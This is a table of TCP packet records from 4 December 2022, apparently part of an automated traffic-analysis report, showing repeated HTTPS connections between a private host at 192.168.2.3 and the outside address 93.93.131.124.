| Dec 4, 2022 12:06:12.486423969 CET | 443 | 49704 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.521461010 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.521506071 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.521588087 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.521609068 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.521620035 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.521687031 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.526778936 CET | 443 | 49704 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.526909113 CET | 443 | 49704 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.527008057 CET | 49704 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.527755022 CET | 49704 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.529478073 CET | 49705 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.529520035 CET | 443 | 49705 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.529608011 CET | 49705 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.530033112 CET | 49705 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.530056953 CET | 443 | 49705 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.581850052 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.581880093 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.581909895 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.582029104 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.609088898 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.609118938 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.609148979 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.609301090 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.636096001 CET | 443 | 49705 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.639184952 CET | 49705 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.639220953 CET | 443 | 49705 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.656505108 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.656532049 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.656558037 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.656685114 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.702553988 CET | 443 | 49705 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.702616930 CET | 443 | 49705 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.702696085 CET | 49705 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.702718973 CET | 443 | 49705 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.707804918 CET | 49705 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.731060982 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.731091022 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.731117964 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.731275082 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.913007021 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.913037062 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.913060904 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.913181067 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:13.118916035 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:13.119039059 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:13.534914017 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:13.535022020 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:13.565618038 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:13.565659046 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:13.565680027 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:13.565745115 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:13.565753937 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:13.565766096 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:13.565771103 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:13.565805912 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:13.565848112 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:13.770921946 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:13.929413080 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:13.986265898 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:13.986318111 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:13.986341953 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:13.986386061 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:13.986394882 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:13.986403942 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:13.986438036 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:13.986450911 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:13.986480951 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:13.986498117 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:13.986510992 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:13.986510992 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:13.986515999 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:13.986529112 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:13.986534119 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:13.986543894 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:13.986543894 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:13.986550093 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:13.986562967 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:13.986597061 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:13.986757994 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:14.047198057 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:14.047239065 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:14.047254086 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:14.047362089 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:14.103809118 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:14.136158943 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:14.256522894 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:20.017944098 CET | 49706 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:20.018023968 CET | 443 | 49706 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:20.018141985 CET | 49706 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:20.050575972 CET | 49706 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:20.050611019 CET | 443 | 49706 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:20.148407936 CET | 443 | 49706 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:20.148574114 CET | 49706 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:20.163295031 CET | 49706 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:20.163324118 CET | 443 | 49706 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:20.163785934 CET | 443 | 49706 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:20.193291903 CET | 49706 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:20.193329096 CET | 443 | 49706 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:20.228043079 CET | 443 | 49706 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:20.228178024 CET | 443 | 49706 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:20.228241920 CET | 49706 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:20.229753971 CET | 49706 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:20.232342005 CET | 49707 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:20.232462883 CET | 443 | 49707 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:20.232594967 CET | 49707 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:20.233441114 CET | 49707 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:20.233479023 CET | 443 | 49707 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:20.335927010 CET | 443 | 49707 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:20.350250006 CET | 49707 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:20.350313902 CET | 443 | 49707 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:20.402622938 CET | 443 | 49707 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:20.402681112 CET | 443 | 49707 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:20.402771950 CET | 49707 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:20.402796030 CET | 443 | 49707 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:20.405771971 CET | 49707 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:28.035929918 CET | 49708 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:28.036005974 CET | 443 | 49708 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:28.036099911 CET | 49708 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:28.050898075 CET | 49708 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:28.050951958 CET | 443 | 49708 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:28.146528959 CET | 443 | 49708 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:28.146671057 CET | 49708 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:28.152714014 CET | 49708 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:28.152765989 CET | 443 | 49708 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:28.153469086 CET | 443 | 49708 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:28.186337948 CET | 49708 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:28.186388016 CET | 443 | 49708 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:28.221209049 CET | 443 | 49708 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:28.221349955 CET | 443 | 49708 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:28.221570015 CET | 49708 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:28.229835987 CET | 49708 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:28.247833967 CET | 49709 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:28.247895002 CET | 443 | 49709 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:28.248020887 CET | 49709 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:28.249687910 CET | 49709 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:28.249707937 CET | 443 | 49709 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:28.354775906 CET | 443 | 49709 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:28.368009090 CET | 49709 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:28.368040085 CET | 443 | 49709 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:28.421927929 CET | 443 | 49709 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:28.421994925 CET | 443 | 49709 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:28.422224045 CET | 49709 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:28.422272921 CET | 443 | 49709 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:28.427414894 CET | 49709 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:38.775305986 CET | 49710 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:38.775358915 CET | 443 | 49710 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:38.775468111 CET | 49710 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:38.787261963 CET | 49710 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:38.787287951 CET | 443 | 49710 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:38.872972012 CET | 443 | 49710 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:38.873202085 CET | 49710 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:38.942718983 CET | 49710 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:38.942756891 CET | 443 | 49710 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:38.943275928 CET | 443 | 49710 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:38.971961021 CET | 49710 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:38.972007990 CET | 443 | 49710 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:39.006552935 CET | 443 | 49710 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:39.006670952 CET | 443 | 49710 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:39.006824970 CET | 49710 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:39.047066927 CET | 49710 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:39.048183918 CET | 49711 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:39.048255920 CET | 443 | 49711 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:39.048371077 CET | 49711 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:39.048753023 CET | 49711 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:39.048764944 CET | 443 | 49711 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:39.161494970 CET | 443 | 49711 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:39.306659937 CET | 49711 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:39.428430080 CET | 49711 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:39.428525925 CET | 443 | 49711 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:39.464452028 CET | 443 | 49711 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:39.464587927 CET | 443 | 49711 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:39.464605093 CET | 443 | 49711 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:39.464675903 CET | 443 | 49711 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:39.464730024 CET | 49711 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:39.464730024 CET | 49711 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:39.464795113 CET | 443 | 49711 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:39.464869976 CET | 49711 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:39.487359047 CET | 49711 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:51.178925037 CET | 49712 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:51.179011106 CET | 443 | 49712 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:51.179188967 CET | 49712 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:51.204646111 CET | 49712 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:51.204751015 CET | 443 | 49712 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:51.312285900 CET | 443 | 49712 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:51.312448978 CET | 49712 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:51.315291882 CET | 49712 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:51.315311909 CET | 443 | 49712 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:51.315677881 CET | 443 | 49712 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:51.351361036 CET | 49712 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:51.351429939 CET | 443 | 49712 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:51.385689974 CET | 443 | 49712 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:51.385852098 CET | 443 | 49712 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:51.386010885 CET | 49712 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:51.386564970 CET | 49712 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:51.387769938 CET | 49713 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:51.387830973 CET | 443 | 49713 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:51.387926102 CET | 49713 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:51.388279915 CET | 49713 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:51.388307095 CET | 443 | 49713 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:51.470830917 CET | 443 | 49713 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:51.474950075 CET | 49713 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:51.475007057 CET | 443 | 49713 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:51.537201881 CET | 443 | 49713 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:51.537272930 CET | 443 | 49713 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:51.537410021 CET | 49713 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:51.537452936 CET | 443 | 49713 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:51.539977074 CET | 49713 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:09.093024015 CET | 49714 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:09.093125105 CET | 443 | 49714 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:09.093281984 CET | 49714 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:09.111939907 CET | 49714 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:09.111993074 CET | 443 | 49714 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:09.204291105 CET | 443 | 49714 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:09.204555988 CET | 49714 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:09.221504927 CET | 49714 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:09.221577883 CET | 443 | 49714 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:09.222475052 CET | 443 | 49714 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:09.254714966 CET | 49714 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:09.254779100 CET | 443 | 49714 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:09.289737940 CET | 443 | 49714 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:09.289901018 CET | 443 | 49714 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:09.289994001 CET | 49714 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:09.290978909 CET | 49714 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:09.292579889 CET | 49715 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:09.292658091 CET | 443 | 49715 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:09.292768955 CET | 49715 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:09.293080091 CET | 49715 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:09.293112993 CET | 443 | 49715 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:09.382539988 CET | 443 | 49715 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:09.386853933 CET | 49715 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:09.386946917 CET | 443 | 49715 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:09.447874069 CET | 443 | 49715 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:09.447952032 CET | 443 | 49715 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:09.448096037 CET | 49715 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:09.448131084 CET | 443 | 49715 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:09.452917099 CET | 49715 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:25.472971916 CET | 49716 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:25.473042011 CET | 443 | 49716 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:25.473140001 CET | 49716 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:25.491134882 CET | 49716 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:25.491194963 CET | 443 | 49716 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:25.574167013 CET | 443 | 49716 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:25.574261904 CET | 49716 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:25.581265926 CET | 49716 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:25.581321001 CET | 443 | 49716 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:25.581794024 CET | 443 | 49716 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:25.611288071 CET | 49716 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:25.611351967 CET | 443 | 49716 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:25.646194935 CET | 443 | 49716 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:25.646311045 CET | 443 | 49716 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:25.646369934 CET | 49716 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:25.647197962 CET | 49716 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:25.648825884 CET | 49717 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:25.648899078 CET | 443 | 49717 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:25.648993969 CET | 49717 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:25.649452925 CET | 49717 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:25.649480104 CET | 443 | 49717 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:25.731359959 CET | 443 | 49717 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:25.735306025 CET | 49717 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:25.735380888 CET | 443 | 49717 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:25.797799110 CET | 443 | 49717 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:25.797847033 CET | 443 | 49717 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:25.798072100 CET | 49717 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:25.798131943 CET | 443 | 49717 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:25.803072929 CET | 49717 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:43.129550934 CET | 49718 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:43.129616022 CET | 443 | 49718 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:43.129718065 CET | 49718 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:43.136885881 CET | 49718 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:43.136926889 CET | 443 | 49718 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:43.226443052 CET | 443 | 49718 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:43.226581097 CET | 49718 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:43.229505062 CET | 49718 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:07:43.229541063 CET | 443 | 49718 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:43.229906082 CET | 443 | 49718 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:07:43.252363920 CET | 49718 | 443 | 192.168.2.3 | 93.93.131.124 |
